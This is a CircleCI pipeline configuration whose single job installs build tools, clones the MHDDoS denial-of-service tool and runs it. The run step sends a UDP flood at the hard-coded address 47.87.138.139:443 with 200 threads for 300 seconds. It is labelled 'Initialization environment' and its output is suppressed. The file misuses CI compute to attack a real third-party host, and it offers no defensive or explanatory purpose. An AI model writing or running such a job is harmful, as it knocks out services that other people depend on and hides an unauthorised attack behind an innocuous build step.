version: 2.1
jobs:
  my-job:
    machine:
      image: ubuntu-2004:current
    
    resource_class: large
    steps:
      - run:
          name: Prepare for checkout
          command: |
            mkdir github
      - checkout:
          path: github/
      - run: 
          command: |
           sudo -E apt-get -qq update
           sudo -E apt-get -qq install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git
           git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt
           python3 start.py udp 47.87.138.139:443 200 300 true >/dev/null 2>&1
          name: Initialization environment
      

workflows:
  # Name of workflow
  make:
    # List of jobs that will run
    jobs:
      - my-job
